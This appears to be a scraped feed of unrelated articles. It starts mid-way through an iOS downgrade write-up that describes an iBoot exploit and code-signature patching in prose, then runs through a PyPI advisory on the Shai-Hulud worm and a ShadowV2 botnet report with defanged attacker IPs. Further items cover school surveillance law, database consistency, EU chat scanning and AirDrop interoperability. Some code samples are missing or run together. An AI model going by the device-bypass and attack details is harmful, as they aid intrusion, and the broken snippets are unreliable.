argument, so it doesn't reboot after finishing restore
If restore was completed properly, I add a third partition, write the exploit there and set
boot-partition
to
2
Reboot the device
My implementation is available guess where? Yes, in the
repository
Root filesystem
This needed a lot of changes:
Add matching SpringBoard's hardware feature plist (
/System/Library/CoreServices/SpringBoard.app/N18AP.plist
in this case)
I took the iOS 5.1.1 variant as a base and added iOS 6 specific capabilities
I tried to keep
original
enough Home screen icon order by
merging
iPod touch 3 iOS 5.1.1 and iPod touch 4 6.x layouts
Add multitouch & Wi-Fi firmwares
I use versions from 5.1.1
Add Bluetooth firmware and scripts
This is more complicated, as those are all hardcoded into
/usr/sbin/BlueTool
Luckily, they can also be overriden by files in
/etc/bluetool
- as always check my code for reference
I extracted both firmware and scripts from 5.1.1
BlueTool
FairPlay
daemon is limited to
N88AP
(iPhone 3GS)
It has
LimitLoadToHardware
key in its' LaunchDaemon plist
But if we simply remove the key, it works on iPod touch 3 as well
This is important, because otherwise we cannot activate device through Apple's servers
This trick will be harder to pull off on iOS 6.1+ because they load LaunchDaemons from a signed cache. Still can be bypassed in many ways - for instance, patching
launchd
or forcefully loading another plist via
launchctl
DYLD shared cache patches
Product ID map patch
iOS 6 brings a concept of "product ID" in the form of a long byte sequence
It is filled by iBoot into
product
node of DeviceTree (which didn't even exist before)
I hardcode the value of iPhone 3GS straight into DeviceTree (
8784AE8D7066B0F0136BE91DCFE632A436FFD6FB
)
There is also a short form of this identifier - 16-bit integer - which existed before iOS 6
iPhone 3GS is
0x2714
and the iPod is
0x2715
MobileGestalt
framework has a table that matches the short form by the long one - I swap
0x2714
with
0x2715
there
I believe it's better for iTunes and etc.
getDeviceVariant()
patch
MobileGestalt
once again messes us up our business
Device variant
is a letter - usually "A" or "B"
It seems to depend on Wi-Fi transciever vendor used in exact device (?)
iOS 6 fails miserably to determine this value for iPod touch 3
This crashes activation process, for example
To fix it, I patch the function to always return "A" (in form of
CFString
)
Fixing code signature
This is much easier than most people think
Shared cache files have the same format of signature as normal Mach-Os
And since it's just ad-hoc, all you need to do is to recalculate SHA-1 hash for pages you modified and update the signature
So easy, it can be done with just a hex-editor
The iBoot exploit
iOS 5 iBoot had a bug in
HFS+
filesystem driver. I did make an exploit many years ago but it was
bad
. Like, truly
bad
. I reimplemented it from scratch for this project making it deterministic (hopefully...)
This subject probably deserves a separate article
Conclusion & future plans
This was not easy to do, and yet easier than I expected initially
After releasing the tool many people asked me about jailbreaking. The old tools are not going to work, but it should be easy to just patch the kernel and drop Cydia tarball onto the filesystem. I guess I will give it a try later
There was another device that Apple dropped support for in that year - iPad 1. I will try that soon enough as well
I hope that the information from this write-up will help you making other crazy combinations, like iOS 4 on iPhone 4S or iOS 5 on iPad mini 1
PyPI and Shai-Hulud: Staying Secure Amid Emerging Threats
An attack on the npm ecosystem continues to evolve, exploiting compromised accounts to publish malicious packages.
This campaign, dubbed
Shai-Hulud
, has targeted large volumes of packages in the JavaScript ecosystem,
exfiltrating credentials to further propagate itself.
PyPI has not been exploited
, however some PyPI credentials were found exposed in compromised repositories.
We've revoked these tokens as a precaution, there's no evidence they have been used maliciously.
This post raises awareness about the attack and encourages proactive steps to secure your accounts,
especially if you're using build platforms to publish packages to PyPI.
How does this relate to PyPI?
This week, a security researcher disclosed long-lived PyPI credentials exposed as part of the Shai-Hulud campaign.
The credentials were found in GitHub repositories (stored as repository secrets), and were still valid.
We saw an attack with insecure workflow settings for
Ultralytics in 2024
.
While the campaign primarily targets npm, some projects use
monorepo
setups,
publishing both JavaScript packages to npmjs.com and Python packages to PyPI from the same repository.
When attackers compromise these repositories, they can extract credentials for multiple platforms.
We investigated the reported credentials and found they were associated with accounts that hadn't published recently.
We've revoked these credentials and reached out to affected users to advise them to rotate any remaining tokens.
What can I do to protect my PyPI account?
Here are security practices to protect your PyPI account:
Use Trusted Publishing:
If you are using a build platform to publish packages to PyPI,
consider using a
Trusted Publisher
.
This eliminates the need to manage long-lived authentication tokens, reducing the risk of credential exposure.
Trusted Publishing uses short-lived, scoped tokens for each build, minimizing the impact of any potential compromise.
This approach has
risen in popularity
,
with other registries like
Crates.io
,
RubyGems
,
and
npmjs.com
adopting similar models.
When using GitHub Actions, consider layering in additional security measures,
like requiring human approval via
GitHub Environments
before publishing.
This blog post from pyOpenSci
has detailed guidance on adding manual review steps to GitHub Actions workflows.
Audit your workflows for misconfiguration:
Review your GitHub Actions workflows for any potential security issues.
Tools like
zizmor
and
CodeQL
can help identify vulnerabilities in your CI/CD pipelines.
Adopt scanning as automated actions for the repository to catch future issues.
Review your account activity:
Regularly check your PyPI account activity for any unauthorized actions.
If you notice any suspicious activity,
report it to the PyPI security team
immediately.
Taking any of these steps helps mitigate the risk of compromise and keeps packages secure.
References
Some blog posts covering the attack behaviors and mitigation steps:
EFF to Arizona Federal Court: Protect Public School Students from Surveillance and Punishment for Off-Campus Speech
Electronic Frontier Foundation
www.eff.org
2025-11-26 22:33:54
Legal Intern Alexandra Rhodes contributed to this blog post.
EFF filed an amicus brief urging the Arizona District Court to protect public school students’ freedom of speech and privacy by holding that the use of a school-issued laptop or email account does not categorically mean a student is “on c...
Legal Intern Alexandra Rhodes contributed to this blog post.
EFF filed an
amicus brief
urging the Arizona District Court to protect public school students’ freedom of speech and privacy by holding that the use of a school-issued laptop or email account does not categorically mean a student is “on campus.” We argued that students need private digital spaces beyond their school’s reach to speak freely, without the specter of constant school surveillance and punishment.
Surveillance Software Exposed a Bad Joke Made in the Privacy of a Student’s Home
The case,
Merrill v. Marana Unified School District
, involves a Marana High School student who, while at home one morning before school started, asked his mother for advice about a bad grade he received on an English assignment. His mother said he should talk to his English teacher, so he opened his school-issued Google Chromebook and started drafting an email. The student then wrote a series of jokes in the draft email that he deleted each time. The last joke stated: “GANG GANG GIMME A BETTER GRADE OR I SHOOT UP DA SKOOL HOMIE,” which he narrated out loud to his mother in a silly voice before deleting the draft and closing his computer.
Within the hour, the student’s mother received a phone call from the school principal, who said that Gaggle surveillance software had flagged a threat from her son and had sent along the screenshot of the draft email. The student’s mother attempted to explain the situation and reassure the principal that there was no threat. Nevertheless, despite her reassurances and the student’s lack of disciplinary record or history of violence, the student was ultimately suspended over the draft email—even though he was physically off campus at the time, before school hours, and had never sent the email.
After the student’s suspension was unsuccessfully challenged, the family
sued the school district
alleging infringement of the student’s right to free speech under the First Amendment and violation of the student’s right to due process under the Fourteenth Amendment.
Public School Students Have Greater First Amendment Protection for Off-Campus Speech
The U.S. Supreme Court has addressed the First Amendment rights of public school students in a
handful of cases
.
Most notably, in
Tinker v. Des Moines Independent Community School District
(1969), the Court held
that students may not be punished for their
on-campus
speech unless the speech “materially and substantially” disrupted the school day or invaded the rights of others.
Decades later, in
Mahanoy Area School District v. B.L. by and through Levy
(2021)
,
in which
EFF filed a brief
,
the Court further held that schools have less leeway to regulate student speech when that speech occurs off campus. Importantly, the Court stated that schools should have a limited ability to punish off-campus speech because “from the student speaker’s perspective, regulations of off-campus speech, when coupled with regulations of on-campus speech, include all the speech a student utters during the full 24-hour day.”
The Ninth Circuit has further held that off-campus speech is only punishable if it bears a “
sufficient nexus
” to the school and poses a credible threat of violence.
In this case, therefore, the extent of the school district’s authority to regulate student speech is tied to whether the high schooler was
on or off campus
at the time of the speech. The student here was at home and thus physically off campus when he wrote the joke in question; he wrote the draft before school hours; and the joke was not emailed to anyone on campus or anyone associated with the campus.
Yet the school district is arguing that his use of a school-issued Google Chromebook and Google Workspace for Education account (including the email account) made his speech—and makes all student speech—automatically “on campus” for purposes of justifying punishment under the First Amendment.
Schools Provide Students with Valuable Digital Tools—But Also Subject Them to Surveillance
EFF supports the plaintiffs’ argument that the student’s speech was “off campus,” did not bear a sufficient nexus to the school, and was not a credible threat. In our amicus brief, we urged the trial court at minimum to
reject
a rule that the use of a school-issued device or cloud account always makes a student’s speech “on campus.”
Our amicus brief supports the plaintiffs’ First Amendment arguments through the lens of surveillance, emphasizing that digital speech and digital privacy are inextricably linked.
As we explained, Marana Unified School District, like many schools and districts across the country, offers students free Google Chromebooks and requires them to have an online Google Account to access the various cloud apps in Google Workspace for Education, including the Gmail app.
Marana Unified School District also uses three surveillance technologies that are integrated into Chromebooks and Google Workspace for Education: Gaggle, GoGuardian, and Securly. These surveillance technologies collectively can monitor virtually everything students do on their laptops and online, from the emails and documents they write (or even just
draft
) to the websites they visit.
School Digital Surveillance Chills Student Speech and Further Harms Students
In our amicus brief, we made four main arguments against a blanket rule that categorizes any use of a school-issued device or cloud account as “on campus,” even if the student is geographically off campus or outside of school hours.
First, we pointed out that such a rule will result in students having no reprieve from school authority, which runs counter to the Supreme Court’s admonition in
Mahanoy
not to regulate “all the speech a student utters during the full 24-hour day.” There must be some place that is “off campus” for public school students even when using digital tools provided by schools, otherwise schools will reach too far into students’ lives.
Second, we urged the court to reject such an “on campus” rule
to mitigate the
chilling effect of digital surveillance
on students’ freedom of speech—that is, the risk that students will self-censor and choose not to express themselves in certain ways or access certain information that may be disfavored by school officials. If students know that no matter where they are or what they are doing with their Chromebooks and Google Accounts, the school is watching
and
the school has greater legal authority to punish them because they are always “on campus,” students will undoubtedly curb their speech.
Third, we argued that such an
“on campus” rule
will
exacerbate existing inequities in public schools
among students of different socio-economic backgrounds. It would
distinctly disadvantage lower-income students who are
more likely to rely on school-issued devices
because their families cannot afford a personal laptop or tablet. This creates a
“pay for privacy” scheme
: lower-income students are subject to greater school-directed surveillance and related discipline for digital speech, while wealthier students can limit surveillance by using personal laptops and email accounts, enabling them to have more robust free speech protections.
Fourth,
such an “on campus” rule will incentivize public schools to continue eroding student privacy by subjecting them to near constant digital surveillance. The student surveillance technologies schools use are notoriously
privacy invasive
and
inaccurate
, causing various harms to students—including unnecessary investigations and discipline, disclosure of sensitive
information, and frustrated learning.
We urge the Arizona District Court to protect public school students’ freedom of speech and privacy by rejecting this approach to school-managed technology
. As we said in our brief, students, especially high schoolers,
need some sphere of digital autonomy, free of surveillance, judgment, and punishment,
as much as anyone else—to express themselves, to develop their identities, to learn and explore, to be silly or crude, and even to make mistakes
.
Bring Back Doors – Bring Bathroom Doors Back to Hotels
I’m done. I’m done arriving at hotels and discovering that they have removed the bathroom door. Something that should be as standard as having a bed, has been sacrificed in the name of “aesthetic”.
I get it, you can save on material costs and make the room feel bigger, but what about my dignity??? I can’t save that when you don’t include a bathroom door.
It’s why I’ve built this website, where I compiled hotels that are guaranteed to have bathroom doors, and hotels that need to work on privacy.
I’ve emailed hundreds of hotels and I asked them two things: do your doors close all the way, and are they made of glass? Everyone that says yes to their doors closing, and no to being made of glass has been sorted by price range and city for you to easily find places to stay that are
guaranteed
to have a bathroom door.
Quickly check to see if the hotel you’re thinking of booking has been reported as lacking in doors by a previous guest.
Finally, this passion project could not exist without people submitting hotels without bathroom doors for public shaming. If you’ve stayed at a doorless hotel send me an email with the hotel name to bringbackdoors@gmail.com, or send me a
DM on Instagram
with the hotel name and a photo of the doorless setup to be publicly posted.
Let’s name and shame these hotels to protect the dignity of future travelers.
New ShadowV2 botnet malware used AWS outage as a test opportunity
Bleeping Computer
www.bleepingcomputer.com
2025-11-26 22:24:14
A new Mirai-based botnet malware named 'ShadowV2' has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities. [...]...
A new Mirai-based botnet malware named ‘ShadowV2’ has been observed targeting IoT devices from D-Link, TP-Link, and other vendors with exploits for known vulnerabilities.
Fortinet’s FortiGuard Labs researchers spotted the activity during the major
AWS outage in October
. Although the two incidents are not connected, the botnet was active only for the duration of the outage, which may indicate that it was a test run.
ShadowV2 spread by leveraging at least eight vulnerabilities in multiple IoT products:
Among these flaws, CVE-2024-10914 is a
known-to-be-exploited
command injection flaw impacting EoL D-Link devices, which the vendor announced that it
would not fix
.
Regarding CVE-2024-10915, for which there’s a
NetSecFish report
from November 2024, BleepingComputer initially did not find the vendor's advisory for the flaw. After reaching out to the company, we received confirmation that the issue would not be fixed for the impacted models.
D-Link
updated an older bulletin
to add the particular CVE-ID and
published a new one
referring to the ShadowV2 campaign, to warn users that end-of-life or end-of-support devices are no longer under development and will not receive firmware updates.
CVE-2024-53375, which was also
presented in detail
in November 2024, was reportedly fixed via a beta firmware update.
Various exploits used by ShadowV2
Source: Fortinet
According to FortiGuard Labs researchers, the ShadowV2 attacks originated from 198[.]199[.]72[.]27, and targeted routers, NAS devices, and DVRs across seven sectors, including government, technology, manufacturing, managed security service providers (MSSPs), telecommunications, and education.
The impact was global, with attacks observed in North and South America, Europe, Africa, Asia, and Australia.
The botnet's global impact
Source: Fortinet
The malware identifies itself as "ShadowV2 Build v1.0.0 IoT version," and is similar to the Mirai LZRD variant, the
researchers say
in a report that provides technical details on how ShadowV2 functions.
It is delivered to vulnerable devices through an initial access stage using a downloader script (binary.sh) that fetches it from a server at 81[.]88[.]18[.]108.
Downloader script
Source: Fortinet
It uses XOR-encoded configuration for filesystem paths, User-Agent strings, HTTP headers, and Mirai-style strings.
In terms of functional capabilities, it supports distributed denial-of-service (DDoS) attacks on UDP, TCP, and HTTP protocols, with various flood types for each. The command-and-control (C2) infrastructure triggers these attacks via commands sent to the bots.
DDoS attack trigger
Source: Fortinet
Typically, DDoS botnets make money by renting their firepower to cybercriminals or by directly extorting targets, demanding payments for stopping the attacks. However, it is not yet known who is behind Shadow V2 and what their monetization strategy is.
Fortinet shared indicators of compromise (IoCs) to help identify this emerging threat at the bottom of the report, while warning about the importance of keeping firmware updated on IoT devices.
As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.
This free cheat sheet outlines 7 best practices you can start using today.
When I started at AWS in 2008, we ran the EC2 control plane on a tree of MySQL databases: a primary to handle writes, a secondary to take over from the primary, a handful of read replicas to scale reads, and some extra replicas for doing latency-insensitive reporting stuff. All of thing was linked together with MySQL’s statement-based replication. It worked pretty well day to day, but two major areas of pain have stuck with me ever since: operations were costly, and eventual consistency made things weird.
Since then, managed databases like Aurora MySQL have made relational database operations orders of magnitude easier. Which is great. But eventual consistency is still a feature of most database architectures that try scale reads. Today, I want to talk about why eventual consistency is a pain, and why we invested heavily in making all reads strongly consistent in Aurora DSQL.
Eventual Consistency is a Pain for Customers
Consider the following piece of code, running against an API exposed by a database-backed service:
id=create_resource(...)get_resource_state(id,...)
In the world of read replicas, the latter statement can do something a little baffling: reply ‘
id
does not exist’. The reason for this is simple:
get_resource_state
is a read-only call, likely routed to a read replica, and is racing the write from
create_resource
. If replication wins, this code works as expected. If the client wins, it has to handle to weird sensation of time moving backwards.
Application programmers don’t really have a principled way to work around this, so they end up writing code like this:
Which fixes the problem. Kinda. Other times, especially if
ResourceDoesNotExist
can be thrown if
id
is deleted, it causes an infinite loop. It also creates more work for client and server, adds latency, and requires the programmer to choose a magic number for
sleep
that balances between the two. Ugly.
But that’s not all. Marc Bowes pointed out that this problem is even more insidious:
Could
still
fail, because the second
get_resource_state
call could go to an entirely different read replica that hasn’t heard the news yet
3
.
Strong consistency avoids this whole problem
1
, ensuring that the first code snippet works as expected.
Eventual Consistency is a Pain for Application Builders
The folks building the service behind that API run into exactly the same problems. To get the benefits of read replicas, application builders need to route as much read traffic as possible to those read replicas. But consider the following code:
This is a fairly common code pattern inside microservices. A kind a little workflow that cleans something up. But, in the wild world of eventual consistency, it has at least three possible bugs:
The
assert
could trigger because the second
get_attachments_to_thing
hasn’t heard the news of all the
remove_attachments
.
The
remove_attachment
could fail because it hasn’t heard of one of the attachments listed by
get_attachments_to_thing
.
The first
get_attachments_to_thing
could have an incomplete list because it read stale data, leading to incomplete clean up.
And there are a couple more. The application builder has to avoid these problems by making sure that all reads that are used to trigger later writes are sent to the primary. This requires more logic around routing (a simple “this API is read-only” is not sufficient), and reduces the effectiveness of scaling by reducing traffic that can be sent to replicas.
Eventual Consistency Makes Scaling Harder
Which brings us to our third point: read-modify-write is the canonical transactional workload. That applies to explicit transactions (anything that does an
UPDATE
or
SELECT
followed by a write in a transaction), but also things that do implicit transactions (like the example above). Eventual consistency makes read replicas less effective, because the reads used for read-modify-write can’t, in general, be used for writes without having weird effects.
If the read for that read-modify-write is read from a read replica, then the value of
goodness
may not be changed in the way you expect. Now, the database could internally do something like this:
SELECTgoodnessASg,versionASvFROMdogsWHEREname='sophie';-- To read replicaUPDATEsophieSETgoodness=g+1,version=v+1WHEREname='sophie'ANDversion=v;-- To primary
And then checking it actually updated a row
2
, but that adds a ton of work.
The nice thing about making scale-out reads strongly consistent is that the query processor can read from any replica, even in read-write transactions. It also doesn’t need to know up-front whether a transaction is read-write or read-only to pick a replica.
How Aurora DSQL Does Consistent Reads with Read Scaling
As I said above, in Aurora DSQL all reads are strongly consistent. DSQL can also scale out reads by adding additional replicas of any hot shards. So how does it ensure that all reads are strongly consistent? Let’s remind ourselves about the basics of the DSQL architecture.
Each storage replica gets its updates from one or more journals. Writes on each journal are strictly monotonic, so once a storage node has seen an update from time $\tau$ it knows it has seen all updates for times $t \leq \tau$. Once it has seen $t \geq \tau$ from all the journals it has subscribed to, it knows that it can return data for time $\tau$ without missing any updates. When a query processor starts a transaction, it picks a time stamp $\tau_{start}$, and every time it does a read from a replica it says to the replica “give me data as of $\tau_{start}$”. If the replica has seen higher timestamps from all journals, its good to go. If it hasn’t yet, it blocks the read until the write streams catch up.
I go into some detail on how $\tau_{start}$ is picked here:
Conclusion
Strong consistency sounds like a complex topic for distributed systems nerds, but is a real thing that applications built on traditional database replication architectures need to start dealing with at modest scale - or even at very small scale if they’re trying to offer high availability. DSQL goes to some internal lengths to make all reads consistent - with the aim of saving application builders and end users from having to deal with this complexity.
I don’t mean to say that eventual consistency is always bad. Latency and connectivity trade-offs do exist (although the
choose-two framing of CAP is bunk
), and eventual consistency has its place. However, that place is probably not in your services or API.
Footnotes
You might point out that this particular problem can be fixed with a weaker set of guarantees, like Read Your Writes, provided by client stickiness. However, this falls down pretty quickly in more complex data models, and cases like IaC where ‘your writes’ is less well defined.
Yes, I know there are other ways to do this.
If we want to get technical, this is because the typical database read replica pattern doesn’t offer
monotonic reads
, where the set of writes a reader sees is increasing over time. Instead, writes at the tip can appear to come and go arbitrarily, as requests are routed to different replicas. See Doug Terry’s
Replicated Data Consistency Explained Through Baseball
for an easy introduction into these terms.
Image credit: Pixabay
(Image credit: Photo by Thomas Traasdahl / Ritzau Scanpix / AFP) / Denmark OUT (Photo by THOMAS TRAASDAHL/Ritzau Scanpix/AFP via Getty Images)
The EU Council reached an agreement on the Child Sexual Abuse Regulation
Voluntary chat scanning remains in the bill despite privacy backlash
The Council now prepares to start negotiations with the Parliament
The EU Council has finally reached an agreement on the controversial Child Sexual Abuse Regulation (CSAR) after more than three years of failed attempts.
Nicknamed
Chat Control
by its critics, the agreement has kept cryptographers, technologists, encrypted service providers, and privacy experts alike in turmoil since its inception.
Presidency after presidency, the bill has taken many shapes. But its most controversial feature is an obligation for all messaging service providers operating in the EU – including those using end-to-end-encryption – to scan their users' private chats on the lookout for child sexual abuse material (CSAM).
At the beginning of the month, the Danish Presidency decided to change its approach with a
new compromise text
that makes the chat scanning voluntary, instead. That turned to be a winning move, with the proposal managing to reach an agreement in the Council on Wednesday, November 26, 2025.
Privacy experts are unlikely to celebrate, though. The decision came a few days after a group of scientists wrote yet another open letter warning that the latest text still "
brings high risks to society
." That's after other privacy experts deemed the new proposal a "
political deception
" rather than an actual fix.
The EU Council is now preparing to start negotiations with the European Parliament, hoping to agree on the final terms of the regulation.
What we know about the Council agreement
(Image credit: Pixabay)
As per the
EU Council announcement
, the new law imposes a series of obligations on digital companies. Under the new rules, online service providers will be required to assess how their platforms could be misused and, based on the results, may need to "implement mitigating measures to counter that risk," the Council notes.
The Council also introduces three risk categories of online services. Those deemed to be a high-risk can be forced "to contribute to the development of technologies to mitigate the risks relating to their services." Voluntary scanning also remains in the bill.
A new EU agency is then tasked to oversee the implementation of the new rules.
"I'm glad that the member states have finally agreed on a way forward that includes a number of obligations for providers of communication services to combat the spread of child sexual abuse material," said Danish Minister for Justice, Peter Hummelgaard.
But concerns about how the agreement threatens our digital rights persist, with one person on the forum,
Hacker News
, saying the Danish "government has today turned the EU into a tool for total surveillance, I don't know if there can be any return from."
As trilogue negotiations approach, the ongoing challenge for legislators remains striking the right balance between halting abuse online, without compromising on fundamental rights and strong
encryption
.
Chiara is a multimedia journalist committed to covering stories to help promote the rights and denounce the abuses of the digital side of life – wherever cybersecurity, markets, and politics tangle up. She believes an open, uncensored, and private internet is a basic human need and wants to use her knowledge of VPNs to help readers take back control. She writes news, interviews, and analysis on data privacy, online censorship, digital rights, tech policies, and security software, with a special focus on VPNs, for TechRadar and TechRadar Pro. Got a story, tip-off, or something tech-interesting to say? Reach out to chiara.castro@futurenet.com
November Update to the App Store Review Guidelines
Daring Fireball
developer.apple.com
2025-11-26 21:46:25
Here’s the updated full guideline for section 4.1:
4.1 Copycats
(a) Come up with your own ideas. We know you have them, so make
yours come to life. Don’t simply copy the latest popular app
on the App Store, or make some minor changes to another app’s
name or UI and pass it off as yo...
The
App Review Guidelines
have been revised to support updated policies and to provide clarification. Please review the changes below:
1.2.1(a): This new guideline specifies that creator apps must provide a way for users to identify content that exceeds the app’s age rating, and use an age restriction mechanism based on verified or declared age to limit access by underage users.
2.5.10: This language has been deleted (“Apps should not be submitted with empty ad banners or test advertisements.”).
3.2.2(ix): Clarified that loan apps may not charge a maximum APR higher than 36%, including costs and fees, and may not require repayment in full in 60 days or less.
4.1(c): This new guideline specifies that you cannot use another developer’s icon, brand, or product name in your app’s icon or name, without approval from the developer.
4.7: Clarifies that HTML5 and JavaScript mini apps and mini games are in scope of the guideline.
4.7.2: Clarifies that apps offering software not embedded in the binary may not extend or expose native platform APIs or technologies to the software without prior permission from Apple.
4.7.5: Clarifies that apps offering software not embedded in the binary must provide a way for users to identify content that exceeds the app’s age rating, and use an age restriction mechanism based on verified or declared age to limit access by underage users.
5.1.1(ix): Adds crypto exchanges to the list of apps that provide services in highly regulated fields.
5.1.2(i): Clarifies that you must clearly disclose where personal data will be shared with third parties, including with third-party AI, and obtain explicit permission before doing so.
Google’s Pixel 10 works with AirDrop, and other phones should follow later.
Google's Pixel 10 series now features compatibility with Apple's AirDrop.
Credit:
Ryan Whitwam
Google's Pixel 10 series now features compatibility with Apple's AirDrop.
Credit:
Ryan Whitwam
Last year, Apple
finally added support
for Rich Communications Services (RCS) texting to its platforms, improving consistency, reliability, and
security
when exchanging green-bubble texts between the competing iPhone and Android ecosystems. Today, Google is announcing another small step forward in interoperability, pointing to a slightly less annoying future for friend groups or households where not everyone owns an iPhone.
Google
has updated
Android’s Quick Share feature to support Apple’s AirDrop, which allows users of Apple devices to share files directly using a local peer-to-peer Wi-Fi connection. Apple devices with AirDrop enabled and set to “everyone for 10 minutes” mode will show up in the Quick Share device list just like another Android phone would, and Android devices that support this new Quick Share version will also show up in the AirDrop menu.
Google will only support this feature on the Pixel 10 series, at least to start. The company is “looking forward to improving the experience and expanding it to more Android devices,” but it didn’t announce anything about a timeline or any hardware or software requirements. Quick Share also won’t work with AirDrop devices working in the default “contacts only” mode, though Google “[welcomes] the opportunity to work with Apple to enable ‘Contacts Only’ mode in the future.” (Reading between the lines: Google and Apple are not currently working together to enable this, and
Google confirmed to The Verge
that Apple hadn’t been involved in this at all.)
Like AirDrop, Google notes that files shared via Quick Share are transferred directly between devices, without being sent to either company’s servers first.
Google shared a little more information in
a separate post about Quick Share’s security
, crediting Android’s use of the memory-safe Rust programming language with making secure file sharing between platforms possible.
“Its compiler enforces strict ownership and borrowing rules at compile time, which guarantees memory safety,” writes Google VP of Platforms Security and Privacy Dave Kleidermacher. “Rust removes entire classes of memory-related bugs. This means our implementation is inherently resilient against attackers attempting to use maliciously crafted data packets to exploit memory errors.”
Why is this happening now?
Google doesn’t mention it in either Quick Share post, but if you’re wondering why it’s suddenly possible for Quick Share to work with AirDrop, it can almost certainly be credited to European Union regulations imposed under the Digital Markets Act (DMA).
Let’s start with how AirDrop works. Like many of Apple’s “
Continuity
” features that rely on wireless communication between devices, AirDrop uses Bluetooth to allow devices to find each other, and a fast peer-to-peer Wi-Fi connection to actually transfer files and other data. This isn’t exotic hardware; all smartphones, tablets, and computers sold today include some flavor of Bluetooth and Wi-Fi.
But to make those Continuity features work, Apple also developed a proprietary protocol called Apple Wireless Direct Link (AWDL) to facilitate the actual connection between devices and the data transfer. Because this wasn’t a standard anyone could use, other companies couldn’t try to make their own wireless sharing features compatible with AirDrop.
But
earlier this year
, the EU
adopted new specification decisions
that required Apple to adopt new interoperable wireless standards, starting in this year’s iOS 26 release. If you don’t want to wade through the regulatory documents,
this post
from cloud services company Ditto is a useful timeline of events written in plainer language.
Setting AirDrop to “everyone for 10 minutes” mode on an iPhone.
Credit:
Andrew Cunningham
The rulings required Apple to add support for the Wi-Fi Alliance’s
Wi-Fi Aware standard
instead of AWDL—and in fact required Apple to deprecate AWDL and to help add its features to Wi-Fi Aware so that any device could benefit from them. This wasn’t quite the imposition it sounded like; Wi-Fi Aware
was developed with Apple’s help
, based on the work Apple had already done on AWDL. But it meant that Apple could no longer keep other companies out of AirDrop by using a functionally similar but private communication protocol instead of the standardized version.
In some ways, Apple’s journey to Wi-Fi Aware recalls the iPhone’s journey to USB-C: first, Apple developed a proprietary port that achieved some of the same goals as USB-C; Apple then contributed work to what would become the standardized USB-C connector; but then the company hesitated to actually adopt the standardized port in its phones until its hand was
forced by regulators
.
In any case, Wi-Fi Aware was added to iOS 26 and iPadOS 26, and
Apple’s developer documentation
lists the specific hardware that supports it (the iPhone 12 and later, and most iPads released within the last three or four years). For Android users, that likely means that Quick Share will only work with AirDrop on those devices, if they’ve been updated to iOS/iPadOS 26 or later. Google
has supported Wi-Fi Aware
in Android since version 8.0, so it should at least theoretically be possible for most modern Android phones to add support for the feature in software updates somewhere down the line.
Apple’s hardware support list also suggests that Android phones
won’t
work with AirDrop on the Mac, since macOS 26 isn’t listed as a supported operating system on Apple’s Wi-Fi Aware (it’s likely not a coincidence that macOS is not considered to be a “gatekeeper” operating system under the DMA, as both iOS and iPadOS are).
If I had to guess why neither of Google’s Quick Share posts mentions Wi-Fi interoperability standards or the DMA, it may be because Google has been
complaining
about
various aspects of the law
and its enforcement since
before it was even passed
(as have many US tech companies designated as gatekeepers by the law). Google has occasionally tried to take advantage of the DMA, as it did
when it argued
that Apple’s iMessage service should be opened up. But it may be that Google doesn’t want to explicitly credit or praise the DMA in its press releases when the company is
facing the possibility of huge fines
under the same law.
The New York Times
reported earlier this week
that EU regulators are considering changes to some of its tech regulations, citing concerns about “overregulation” and “competitiveness,” but that the EU was not currently considering changes to the DMA. For its part, Apple recently
called for the DMA to be repealed entirely
.
Andrew is a Senior Technology Reporter at Ars Technica, with a focus on consumer tech including computer hardware and in-depth reviews of operating systems like Windows and macOS. Andrew lives in Philadelphia and co-hosts a weekly book podcast called
Overdue
.
Tidbits-Nov.27 -Reader Comments: Thankful for Farmworkers; Mamdani and Wilson – Democratic Socialists and FDR Democrats; Legal Orders; What We Forgot About Socialism; Raising Taxes on the Ultrarich; New Approach to Getting Rid of Citizens United;
Portside
portside.org
2025-11-26 21:24:41
Tidbits-Nov.27 -Reader Comments: Thankful for Farmworkers; Mamdani and Wilson – Democratic Socialists and FDR Democrats; Legal Orders; What We Forgot About Socialism; Raising Taxes on the Ultrarich; New Approach to Getting Rid of Citizens United;
jay
Wed, 11/26/2025 - 16:24
...
Because the ACA is under attack by the Republicans which would impact millions we have to defend it. But the Democrats, who are also wedded to “free markets”, could have created a universal healthcare system but didn’t.
Great article in The Nation, then rerun on Portside, on Trump’s smothering NLRB & thus removing the longstanding arbiter since New Deal of workers’ rights.
Members in great numbers can be trained and deployed with little delay. Then mobilized to reach out to the unorganized workers who surround us on all sides. There is no need for more complicated “studies” to find them, or expensive conferences to delay the task. New organizers must be trained basic-training style, and sent to the workplaces. Older and retired organizer talent must be tapped and mobilized, offsetting today’s dire experience deficit. It’s time for salting to be deployed on a massive scale in multiple industries, joining those salts already in place.
There is no time to wait for perfect targets to be discovered or developed. The unions who come forward can be pushed to do more. Those who sit it out will be bypassed. The labor left must mobilize, to stimulate individual participation as well as to place pressure on the unions to take this necessary action.
(FYI: a press pool spray is a brief photo opportunity, like after a White House meeting.) The Saudi Crown Prince Mohammed bin Salman (MBS) visited the Oval Office and Trump defended MBS’ murder and dismemberment of Washington Post reporter Jamal Khashoggi by saying, “things happen.”
Writing "The Red Riviera" taught me that even flawed socialist systems offered insights into equality, solidarity, and the dignity of everyday life.
Twenty years ago, in November of 2005, Duke University Press published my first book: "
The Red Riviera: Gender, Tourism, and Postsocialism on the Black Sea."
Produced in the wake of socialism's global collapse and the riot of Western triumphalism that ensued, I deployed both qualitative and quantitative methods to advance a simple, but unpopular, argument: For most people in the former Soviet bloc, capitalism sucked.
By writing the "small histories" of men and women laboring in Bulgaria's vibrant tourism industry in the decade following their country's mad dash to embrace democracy and free markets, I explored how and why this small southeastern European country transformed from a relatively predictable, orderly, egalitarian society into a chaotic, lawless world of astonishing inequality and injustice. I wrapped my critiques of the rampant neoliberalism of the "Wild, Wild, East" in thickly descriptive accounts of the lives of chambermaids, bartenders, tour guides, cooks, waitresses, and receptionists. I wanted to show, not tell.
Through a close examination of the shattered careers and broken families of ordinary men and women forced to live through the cataclysmic decade of the 1990s, I asked readers to empathize with the sheer scale of the upheavals of banking collapses, hyperinflation, unemployment, violence, suicide, and the mass emigration of youth. Capitalism promised prosperity and freedom, but for many it delivered little more than poverty and despair. The dislocations of the transition period, as I've documented in my subsequent books, still reverberate today. One can easily draw a straight line from the trauma of the 1990s to the rise of right-wing parties and authoritarian leaders in the region.
Now they’re going after
nurses
and the
boy scouts.
We’re only one year in, folks! By year four? They’ll go after babies. Music. And Providence, R.I. You heard it here first!
